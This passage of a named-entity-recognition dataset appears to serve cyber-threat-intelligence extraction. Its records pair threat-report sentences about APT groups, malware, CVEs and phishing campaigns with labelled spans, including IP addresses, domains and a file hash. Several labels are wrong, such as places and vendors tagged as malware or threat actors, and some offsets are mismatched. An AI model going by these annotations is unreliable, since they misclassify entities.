Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims .", "spans": {"SYSTEM: Cybereason Mobile": [[33, 50]], "SYSTEM: Cybereason Defense Platform": [[89, 116]], "TOOL: .doc files": [[254, 264]], "MALWARE: RTF documents": [[285, 298]], "VULNERABILITY: CVE-2017-8570": [[323, 336]], "VULNERABILITY: Composite": [[339, 348]], "VULNERABILITY: Moniker": [[349, 356]], "ORGANIZATION: MSPs": [[402, 406]], "THREAT_ACTOR: APT10": [[419, 424]], "MALWARE: MSP": [[448, 451]], "VULNERABILITY: exploit": [[503, 510]]}, "info": {"id": "cyberner_stix_train_007696", "source": "cyberner_stix_train"}} {"text": "Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong .", "spans": {"VULNERABILITY: CVE-2017-0144": [[75, 88]]}, "info": {"id": "cyberner_stix_train_007697", "source": "cyberner_stix_train"}} {"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . 
However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit ( CVE-2018-0798 ) .", "spans": {"TOOL: xlsm file": [[38, 47]], "MALWARE: it": [[50, 52]], "FILEPATH: AsyncRAT": [[249, 257]], "VULNERABILITY: exploit": [[305, 312]], "VULNERABILITY: CVE-2018-0798": [[315, 328]]}, "info": {"id": "cyberner_stix_train_007698", "source": "cyberner_stix_train"}} {"text": "Now , using these strings method1 can use reflection to call sendTextMessage and process the payment . As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition . The functionality ( connect or bind ) depends on the data contained within the named pipe . This has been coined as the Mark Heptad yes after this author and creator .", "spans": {"ORGANIZATION: Mark Heptad": [[363, 374]]}, "info": {"id": "cyberner_stix_train_007699", "source": "cyberner_stix_train"}} {"text": "While continuing to monitor activity of the OceanLotus APT Group , Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file . The Winnti group’s Opsec was dismal to say the least . This mode of operation is typical of many hacker groups—and especially of Winnti .", "spans": {"THREAT_ACTOR: OceanLotus": [[44, 54]], "ORGANIZATION: Cylance": [[67, 74]], "THREAT_ACTOR: Winnti": [[218, 224], [343, 349]], "THREAT_ACTOR: hacker": [[311, 317]]}, "info": {"id": "cyberner_stix_train_007700", "source": "cyberner_stix_train"}} {"text": "However , it does n't request permissions like BIND_ADMIN . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns . The malicious updaters were hosted on the official liveupdate01s.asus.com and liveupdate01.asus.com ASUS update servers . 
Given the widespread adoption of Citrix in enterprises globally , we suspect the number of impacted organizations is far greater and in several sectors .", "spans": {"THREAT_ACTOR: APT10": [[103, 108]], "URL: liveupdate01s.asus.com": [[249, 271]], "URL: liveupdate01.asus.com": [[276, 297]], "ORGANIZATION: ASUS": [[298, 302]], "TOOL: Citrix": [[353, 359]]}, "info": {"id": "cyberner_stix_train_007701", "source": "cyberner_stix_train"}} {"text": "Figure 1 . OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto . A new URI is available: /uploadtm.php .", "spans": {"THREAT_ACTOR: OceanLotus": [[11, 21]], "TOOL: KerrDown": [[98, 106]], "ORGANIZATION: Palo Alto": [[124, 133]], "DOMAIN: /uploadtm.php": [[160, 184]]}, "info": {"id": "cyberner_stix_train_007702", "source": "cyberner_stix_train"}} {"text": "CTU researchers assess with high confidence that the threat actors follow an established playbook during an intrusion .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_007703", "source": "cyberner_stix_train"}} {"text": "The Full Shamoon : How the Devastating Malware Was Inserted Into Networks", "spans": {"MALWARE: Shamoon": [[9, 16]]}, "info": {"id": "cyberner_stix_train_007704", "source": "cyberner_stix_train"}} {"text": "Figure 2 : Bit.ly statistics for a phishing landing page targeting Bank Austria customers The actor appears to have recently begun using “ .top ” top-level domains ( TLDs ) for their phishing landing pages and have implemented a consistent naming structure as shown below . The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors . 
Patchwork is a cyberespionage group that was first observed in December 2015 .", "spans": {"SYSTEM: Bank Austria": [[67, 79]], "THREAT_ACTOR: threat actors": [[278, 291]], "THREAT_ACTOR: Patchwork": [[396, 405]]}, "info": {"id": "cyberner_stix_train_007705", "source": "cyberner_stix_train"}} {"text": "] com 54.71.249 [ . Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME . The threat actors behind the campaign use social engineering to infect their victims with the Pierogi backdoor for cyber espionage purposes . Two days following the OT activity , Sandworm deployed a new variant of CADDYWIPER throughout the IT environment .", "spans": {"ORGANIZATION: Dragos": [[20, 26]], "THREAT_ACTOR: XENOTIME": [[103, 111]], "MALWARE: Pierogi backdoor": [[208, 224]], "THREAT_ACTOR: Sandworm": [[293, 301]], "TOOL: CADDYWIPER": [[328, 338]], "SYSTEM: IT environment": [[354, 368]]}, "info": {"id": "cyberner_stix_train_007706", "source": "cyberner_stix_train"}} {"text": "Of the various binaries downloaded , the most interesting are null , which serves as a local and reverse shell , and rootdaemon , which takes care of privilege escalation and data acquisition . First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims . JhoneRAT : 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 . 
Antivirus software identifies threats by matching a particular piece of softwares code to programs it has identified as malicious in its database .", "spans": {"MALWARE: JhoneRAT": [[403, 411]], "FILEPATH: 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69": [[414, 478]], "ORGANIZATION: Antivirus software": [[481, 499]]}, "info": {"id": "cyberner_stix_train_007707", "source": "cyberner_stix_train"}} {"text": "Cybereason estimates that the files are specifically meant to lure and appeal to victims from the Middle East , especially towards individuals and entities in the Palestinian territories likely related to the Palestinian government or the Fatah movement .", "spans": {"ORGANIZATION: Cybereason": [[0, 10]], "MALWARE: Middle East": [[98, 109]]}, "info": {"id": "cyberner_stix_train_007708", "source": "cyberner_stix_train"}} {"text": "However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , Barium , Wicked Panda , and GREF .", "spans": {"THREAT_ACTOR: APT20": [[36, 41]], "VULNERABILITY: zero-day exploits": [[50, 67]], "MALWARE: Winnti": [[212, 218]], "THREAT_ACTOR: Barium": [[253, 259]]}, "info": {"id": "cyberner_stix_train_007709", "source": "cyberner_stix_train"}} {"text": "Some variants have gone so far as to use a different key for the strings of each class . APT5 targeted the network of an electronics firm that sells products for both industrial and military applications . TermSvc Terminal service configuration ( working on Win Xp/2003 ) . 
None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": {"THREAT_ACTOR: APT5": [[89, 93]], "ORGANIZATION: electronics firm": [[121, 137]], "ORGANIZATION: industrial": [[167, 177]], "ORGANIZATION: military": [[182, 190]], "SYSTEM: Win Xp/2003": [[258, 269]]}, "info": {"id": "cyberner_stix_train_007710", "source": "cyberner_stix_train"}} {"text": "SMS messages . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks .", "spans": {"TOOL: POWRUNER": [[15, 23]], "TOOL: malicious RTF": [[46, 59]], "VULNERABILITY: CVE-2017-0199": [[80, 93]]}, "info": {"id": "cyberner_stix_train_007711", "source": "cyberner_stix_train"}} {"text": "SNAKEMACKEREL operations continue to be some of the most far-reaching and sophisticated cyber espionage and intelligence campaigns to date .", "spans": {"THREAT_ACTOR: SNAKEMACKEREL": [[0, 13]]}, "info": {"id": "cyberner_stix_train_007712", "source": "cyberner_stix_train"}} {"text": "These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations . 
Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks .", "spans": {"ORGANIZATION: private industry": [[38, 54]], "ORGANIZATION: military institutions": [[122, 143]], "ORGANIZATION: governmental organizations": [[150, 176]], "ORGANIZATION: political": [[225, 234], [390, 399]], "ORGANIZATION: human rights organizations": [[246, 272]], "ORGANIZATION: CTU": [[321, 324]], "ORGANIZATION: defense organization": [[404, 424]]}, "info": {"id": "cyberner_stix_train_007713", "source": "cyberner_stix_train"}} {"text": "The callee then invokes the getAction method to get the decrypted content . which provides a range of services to UK Government . Looking deeper into the structure of SHIPPING_MX00034900_PL_INV_pdf.zip , the attachment has two . Indicators of attack are not so much a static description of the attacker , but a dynamic profile of how an attacker interacts with your technologies and users .", "spans": {"ORGANIZATION: UK Government": [[114, 127]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[167, 201]]}, "info": {"id": "cyberner_stix_train_007715", "source": "cyberner_stix_train"}} {"text": "This belief is based on the observation that in all of the other PinchDuke samples we have analyzed , the date of the campaign identifier has been within a day of the compilation date .", "spans": {"MALWARE: PinchDuke": [[65, 74]]}, "info": {"id": "cyberner_stix_train_007716", "source": "cyberner_stix_train"}} {"text": "Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . 
Kaspersky Lab documented this behavior in 2014 .", "spans": {"VULNERABILITY: Carbanak": [[28, 36]], "ORGANIZATION: banks": [[70, 75]], "ORGANIZATION: Kaspersky Lab": [[193, 206]]}, "info": {"id": "cyberner_stix_train_007717", "source": "cyberner_stix_train"}} {"text": "The blog post said HummingBad \" uses a completely different infrastructure with little in common '' with Shedun . simultaneous use of the detected Win32/KillDisk.NBO variants . APT33 : 5.187.21.71 backupnet.ddns.net . In some instances , two randomly generated bytes are added to the end of the file , which invalidates the detection of the dropped files using simple checksum - based techniques .", "spans": {"MALWARE: HummingBad": [[19, 29]], "TOOL: Win32/KillDisk.NBO": [[147, 165]], "THREAT_ACTOR: APT33": [[177, 182]], "IP_ADDRESS: 5.187.21.71": [[185, 196]], "DOMAIN: backupnet.ddns.net": [[197, 215]], "TOOL: checksum - based techniques": [[368, 395]]}, "info": {"id": "cyberner_stix_train_007719", "source": "cyberner_stix_train"}} {"text": "Given the many artifacts we discovered in the malware code , as well as infrastructure analysis , we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions , just like HackingTeam . Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle . 
The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": {"MALWARE: Skygofree": [[148, 157]], "ORGANIZATION: HackingTeam": [[241, 252]], "THREAT_ACTOR: actors": [[374, 380]], "THREAT_ACTOR: admin@338": [[405, 414]], "ORGANIZATION: governments": [[498, 509]]}, "info": {"id": "cyberner_stix_train_007720", "source": "cyberner_stix_train"}} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents .", "spans": {"MALWARE: slides": [[33, 39]], "VULNERABILITY: CVE-2017-8759": [[64, 77]], "TOOL: Microsoft .NET framework": [[121, 145]], "FILEPATH: decoy documents": [[152, 167]], "ORGANIZATION: politically": [[218, 229]], "ORGANIZATION: militarily": [[233, 243]], "ORGANIZATION: political": [[303, 312]]}, "info": {"id": "cyberner_stix_train_007721", "source": "cyberner_stix_train"}} {"text": "In other words , it goes through every object on the screen and saves its text data . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . 
Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 .", "spans": {"THREAT_ACTOR: APT28": [[90, 95]], "ORGANIZATION: military": [[245, 253]], "ORGANIZATION: government": [[258, 268]]}, "info": {"id": "cyberner_stix_train_007722", "source": "cyberner_stix_train"}} {"text": "In addition to the US government , they have targeted organizations across the Defense , Energy , Extractive , Financial , Insurance , Legal , Manufacturing Media , Think Tanks , Pharmaceutical , Research and Technology industries , along with Universities .", "spans": {}, "info": {"id": "cyberner_stix_train_007723", "source": "cyberner_stix_train"}} {"text": "Based on these , we assess with high confidence that the actor delivered the manipulated installer using the Telegram messenger .", "spans": {"TOOL: Telegram": [[109, 117]]}, "info": {"id": "cyberner_stix_train_007724", "source": "cyberner_stix_train"}} {"text": "Enlarge / Top 20 countries targeted by Hummingbad/Shedun . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus . APT33 : 8.26.21.223 [REDACTED].ddns.net . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": {"MALWARE: Hummingbad/Shedun": [[39, 56]], "ORGANIZATION: governments": [[71, 82]], "THREAT_ACTOR: ZINC/Lazarus": [[257, 269]], "THREAT_ACTOR: APT33": [[272, 277]], "IP_ADDRESS: 8.26.21.223": [[280, 291]], "DOMAIN: [REDACTED].ddns.net": [[292, 311]], "ORGANIZATION: Harrison": [[337, 345]]}, "info": {"id": "cyberner_stix_train_007725", "source": "cyberner_stix_train"}} {"text": "The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . 
Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": {"THREAT_ACTOR: APT41": [[34, 39]], "VULNERABILITY: Nitris Exploit Kit": [[156, 174]], "VULNERABILITY: CottonCastle": [[196, 208]]}, "info": {"id": "cyberner_stix_train_007726", "source": "cyberner_stix_train"}} {"text": "The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA .", "spans": {"ORGANIZATION: Government": [[9, 19]], "ORGANIZATION: government": [[79, 89]], "THREAT_ACTOR: HIDDEN COBRA": [[93, 105]]}, "info": {"id": "cyberner_stix_train_007727", "source": "cyberner_stix_train"}} {"text": "Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible . At the moment , the group is known to target Russian and Ukrainian banks .", "spans": {"TOOL: Taidoor malware": [[41, 56]], "ORGANIZATION: banks": [[204, 209]]}, "info": {"id": "cyberner_stix_train_007728", "source": "cyberner_stix_train"}} {"text": "The actors frequently use the stolen data to create cloned physical cards , which they use to attempt to withdraw funds from ATMs . 
The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "THREAT_ACTOR: attackers": [[136, 145]], "TOOL: emails": [[160, 166]], "FILEPATH: XLS files": [[192, 201]], "ORGANIZATION: employees working in the banking sector": [[205, 244]]}, "info": {"id": "cyberner_stix_train_007729", "source": "cyberner_stix_train"}} {"text": "The first is a set of campaigns from the 16th and 17th of April , 2009 , that targeted a US based foreign policy think tank , as well as government institutions in Poland and the Czech Republic .", "spans": {}, "info": {"id": "cyberner_stix_train_007730", "source": "cyberner_stix_train"}} {"text": "] commydriveweb [ . The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted . For example , the following command , which was issued by an APT1 actor , will listen for incoming connections on port 443 on the hop and automatically proxy them to the Shanghai IP address 58.247.242.254 on port 443 . Any Greatness affiliates do n’t need a specific set of skills .", "spans": {"THREAT_ACTOR: APT1": [[189, 193]], "IP_ADDRESS: 58.247.242.254": [[318, 332]]}, "info": {"id": "cyberner_stix_train_007731", "source": "cyberner_stix_train"}} {"text": "The ShadowBrokers is a group of hackers known for leaking exclusive information about the National Security Agency – NSA 's hacking tools and tactics . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": {"THREAT_ACTOR: ShadowBrokers": [[4, 17]], "ORGANIZATION: NSA": [[117, 120]], "ORGANIZATION: Iranians": [[219, 227]]}, "info": {"id": "cyberner_stix_train_007732", "source": "cyberner_stix_train"}} {"text": "Dropper variants are usually barely functioning photo utility , games , or sex related apps . 
A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting . We observed as the new threat attempted to deploy files that changed every 20-30 minutes on thousands of devices . During the SolarWinds Compromise , APT29 added their own devices as allowed IDs for active sync using Set - CASMailbox , allowing it to obtain copies of victim mailboxes .", "spans": {"THREAT_ACTOR: SolarWinds Compromise": [[394, 415]], "THREAT_ACTOR: APT29": [[418, 423]]}, "info": {"id": "cyberner_stix_train_007733", "source": "cyberner_stix_train"}} {"text": "Using Reflection , the server can load the assembly of the client to find the relevant functions and passwords .", "spans": {"TOOL: server": [[23, 29]]}, "info": {"id": "cyberner_stix_train_007734", "source": "cyberner_stix_train"}} {"text": "The two executables related to Hermes are bitsran.exe and RSW7B37.tmp . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": {"TOOL: Hermes": [[31, 37]], "MALWARE: bitsran.exe": [[42, 53]], "MALWARE: RSW7B37.tmp": [[58, 69]], "VULNERABILITY: 0-day": [[183, 188]], "TOOL: Adobe Flash Player": [[191, 209]], "VULNERABILITY: exploit": [[210, 217]]}, "info": {"id": "cyberner_stix_train_007735", "source": "cyberner_stix_train"}} {"text": "Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . 
The POST message is sent to the same site as the fake login page—which an attacker can control inside the Tor network .", "spans": {"THREAT_ACTOR: Leviathan": [[29, 38]], "ORGANIZATION: defense contractors": [[133, 152]]}, "info": {"id": "cyberner_stix_train_007736", "source": "cyberner_stix_train"}} {"text": "Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "THREAT_ACTOR: Neodymium": [[44, 53]], "THREAT_ACTOR: activity groups": [[93, 108]], "ORGANIZATION: economic": [[167, 175]], "THREAT_ACTOR: PROMETHIUM": [[188, 198]], "THREAT_ACTOR: NEODYMIUM": [[203, 212]], "MALWARE: CRASHOVERRIDE": [[506, 519]], "MALWARE: malware": [[520, 527]]}, "info": {"id": "cyberner_stix_train_007737", "source": "cyberner_stix_train"}} {"text": "Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits – 4 digits) and the number of cycles (billCount – 2 digits) to repeat the dispensing operation (see Figure 10) . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": {"MALWARE: Ploutus-D": [[0, 9]], "THREAT_ACTOR: attackers": [[26, 35]], "ORGANIZATION: users": [[246, 251]]}, "info": {"id": "cyberner_stix_train_007738", "source": "cyberner_stix_train"}} {"text": "Initial request by EventBot Initial request by EventBot to run as a service . 
In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks .", "spans": {"MALWARE: EventBot": [[19, 27], [47, 55]], "MALWARE: Gh0st RAT": [[119, 128]], "THREAT_ACTOR: Ghost Dragon": [[139, 151]], "MALWARE: Emissary": [[345, 353]], "THREAT_ACTOR: Lotus Blossom": [[477, 490]], "MALWARE: Emissary Trojan": [[514, 529]]}, "info": {"id": "cyberner_stix_train_007739", "source": "cyberner_stix_train"}} {"text": "Adversaries also changed some constants , such as the XOR key used in the previous version .", "spans": {}, "info": {"id": "cyberner_stix_train_007740", "source": "cyberner_stix_train"}} {"text": "In this blog , we also document other 2017 activity so far by this attack group , including their distribution of ZeroT malware and secondary payloads PCrat S-VULNAME/Gh0st .", "spans": {"MALWARE: ZeroT": [[114, 119]], "VULNERABILITY: PCrat S-VULNAME/Gh0st": [[151, 172]]}, "info": {"id": "cyberner_stix_train_007741", "source": "cyberner_stix_train"}} {"text": "On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": {"MALWARE: ServHelper": [[66, 76]], "TOOL: emails": [[138, 144]], "MALWARE: RTLO technique": [[194, 208]], "FILEPATH: decoy documents": [[228, 243]]}, "info": {"id": "cyberner_stix_train_007742", "source": "cyberner_stix_train"}} {"text": "FakeSpy Chunghwa Post version installation process and application UI . 
Bitdefender’s investigation shows the attackers’ main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee’s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks . Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "ORGANIZATION: Chunghwa Post": [[8, 21]], "THREAT_ACTOR: Bitdefender’s": [[72, 85]], "ORGANIZATION: financial transactions": [[340, 362]], "ORGANIZATION: ATM networks": [[366, 378]], "THREAT_ACTOR: Gorgon Group": [[441, 453]]}, "info": {"id": "cyberner_stix_train_007743", "source": "cyberner_stix_train"}} {"text": "The provided information is then passed to a CreateProcessAsUserA call and the specified command is executed .", "spans": {}, "info": {"id": "cyberner_stix_train_007744", "source": "cyberner_stix_train"}} {"text": "BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . In 2013 , Rapid7 reported on a series of relatively amateur attacks against Pakistani targets .", "spans": {"MALWARE: BalkanRAT": [[0, 9]], "MALWARE: BalkanDoor": [[120, 130]], "ORGANIZATION: Rapid7": [[246, 252]]}, "info": {"id": "cyberner_stix_train_007745", "source": "cyberner_stix_train"}} {"text": "It is possible that CVE-2017-8759 was being used by additional actors . 
Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": {"VULNERABILITY: CVE-2017-8759": [[20, 33]], "THREAT_ACTOR: actors": [[63, 69]], "MALWARE: GandCrab": [[115, 123]], "ORGANIZATION: customers": [[164, 173]], "ORGANIZATION: IT support firms": [[184, 200]]}, "info": {"id": "cyberner_stix_train_007746", "source": "cyberner_stix_train"}} {"text": "TG-3390 actors have used Java exploits in their SWCs .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: Java": [[25, 29]], "TOOL: exploits": [[30, 38]], "SYSTEM: SWCs": [[48, 52]]}, "info": {"id": "cyberner_stix_train_007747", "source": "cyberner_stix_train"}} {"text": "Extract data from WeChat app . In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable . In most cases , the downloaded file is either an executable that masquerades as a Microsoft Word document or a weaponized Microsoft Word document . According to a recent study by Trellix and the Center for Strategic and International Studies CSIS , 86 of organizations believe they have been targeted by a nationstate threat actor .", "spans": {"SYSTEM: WeChat": [[18, 24]], "TOOL: ProjectSauron": [[70, 83]], "TOOL: malicious modules": [[93, 110]], "TOOL: Microsoft Word document": [[346, 369]], "TOOL: weaponized Microsoft Word": [[375, 400]], "ORGANIZATION: Trellix": [[443, 450]], "ORGANIZATION: Center for Strategic and International Studies CSIS": [[459, 510]], "ORGANIZATION: organizations": [[519, 532]], "THREAT_ACTOR: nationstate threat actor": [[570, 594]]}, "info": {"id": "cyberner_stix_train_007748", "source": "cyberner_stix_train"}} {"text": "Version 0.3.0.1 includes Italian and Spanish language compatibility within the resources section . 
The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East .", "spans": {"MALWARE: backdoor": [[140, 148]]}, "info": {"id": "cyberner_stix_train_007749", "source": "cyberner_stix_train"}} {"text": "The process starts when an SMS phishing message arrives at a user ’ s phone . We have identified the tools , techniques , and network activities used in these continuing attacks—which we have dubbed Night Dragon—as originating primarily in China . At this point , the batch script renames the “ 28847 ” file in “ 28847.exe ” , opens it using “ pfljk ,fkbcerbgblfhs ” as password and the file contained inside the “ 28847.exe ” file will be renamed in “ WuaucltIC.exe ” . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"THREAT_ACTOR: Night Dragon—as": [[199, 214]], "FILEPATH: 28847": [[295, 300]], "FILEPATH: 28847.exe": [[312, 321], [412, 421]], "FILEPATH: WuaucltIC.exe": [[449, 462]]}, "info": {"id": "cyberner_stix_train_007750", "source": "cyberner_stix_train"}} {"text": "“ Agent Smith ” repacks its prey apps at smali/baksmali code level . The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand . If not stopped , Dexphot ultimately ran a cryptocurrency miner on the device , with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware . 
Cloud API APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "TOOL: decoy": [[95, 100]], "TOOL: Chitpas Tant Kridakon": [[120, 141]], "MALWARE: Dexphot": [[235, 242]], "THREAT_ACTOR: Cloud API APT29": [[413, 428]], "SYSTEM: Microsoft Graph API": [[447, 466]], "SYSTEM: Azure and M365 environments": [[501, 528]]}, "info": {"id": "cyberner_stix_train_007751", "source": "cyberner_stix_train"}} {"text": "While the “ core ” module resides inside the APK file , it is encrypted and disguised as a JPG file – the first two bytes are actually the magic header of JPG files , while the rest of the data is encoded with an XOR cipher . At the moment , the group is known to target Russian and Ukrainian banks . 5 、An encrypted data file that holds three additional executables that are loaded into system processes via process hollowing . Enterprise T1649 Steal or Forge Authentication Certificates APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates .", "spans": {"ORGANIZATION: banks": [[293, 298]], "THREAT_ACTOR: Steal or Forge Authentication Certificates APT29": [[446, 494]]}, "info": {"id": "cyberner_stix_train_007752", "source": "cyberner_stix_train"}} {"text": "To date , Whitefly has attacked organizations in the healthcare , media , telecommunications , and engineering sectors . 
El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here .", "spans": {"THREAT_ACTOR: Whitefly": [[10, 18]], "ORGANIZATION: healthcare": [[53, 63]], "ORGANIZATION: media": [[66, 71]], "ORGANIZATION: telecommunications": [[74, 92]], "ORGANIZATION: engineering sectors": [[99, 118]], "ORGANIZATION: Kaspersky": [[203, 212]]}, "info": {"id": "cyberner_stix_train_007753", "source": "cyberner_stix_train"}} {"text": "The Right App at the Right Time The malicious HenBox and embedded DroidVPN app combination is one instance of the type of legitimate apps the attackers choose to mimic to compromise their victims . The hackers behind Winnti have also set their sights on Japan’s biggest chemical company , Shin-Etsu Chemical . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website .", "spans": {"MALWARE: HenBox": [[46, 52]], "THREAT_ACTOR: hackers": [[202, 209]], "ORGANIZATION: chemical company": [[270, 286]], "ORGANIZATION: Shin-Etsu Chemical": [[289, 307]], "THREAT_ACTOR: APT16": [[332, 337]], "ORGANIZATION: media": [[357, 362]], "THREAT_ACTOR: APT actors": [[383, 393]], "ORGANIZATION: government agency": [[420, 437]]}, "info": {"id": "cyberner_stix_train_007754", "source": "cyberner_stix_train"}} {"text": "Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes .", "spans": {"TOOL: Powershell": [[0, 10]], "MALWARE: MimiKatz": [[44, 52]]}, "info": {"id": "cyberner_stix_train_007755", "source": "cyberner_stix_train"}} {"text": "The complexity and continual development of these tools indicates a mature development process .", "spans": {}, "info": {"id": "cyberner_stix_train_007756", "source": "cyberner_stix_train"}} {"text": "We found that 
there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload .", "spans": {"TOOL: Luckystrike": [[128, 139]]}, "info": {"id": "cyberner_stix_train_007757", "source": "cyberner_stix_train"}} {"text": "remit , SVR , the primary foreign intelligence agency , and the aforementioned GRU .", "spans": {"ORGANIZATION: GRU": [[79, 82]]}, "info": {"id": "cyberner_stix_train_007758", "source": "cyberner_stix_train"}} {"text": "This happens because the IDE executes the code from the Android debug bridge ( ADB ) by calling the activity declared in the manifest by name . DragonOK appears to operate out of China 's Jiangsu Province . To check this , it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": {"SYSTEM: Android debug bridge": [[56, 76]], "THREAT_ACTOR: DragonOK": [[144, 152]], "MALWARE: COSMICENERGY": [[355, 367]], "MALWARE: specialized OT malware": [[393, 415]]}, "info": {"id": "cyberner_stix_train_007759", "source": "cyberner_stix_train"}} {"text": "In 2018 , Kaspersky published a report on one of their campaigns , named Operation AppleJeus .", "spans": {}, "info": {"id": "cyberner_stix_train_007760", "source": "cyberner_stix_train"}} {"text": "Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications .", "spans": {"MALWARE: HttpBrowser": [[6, 17]]}, "info": {"id": "cyberner_stix_train_007761", "source": "cyberner_stix_train"}} {"text": "The first time this happened was at the beginning 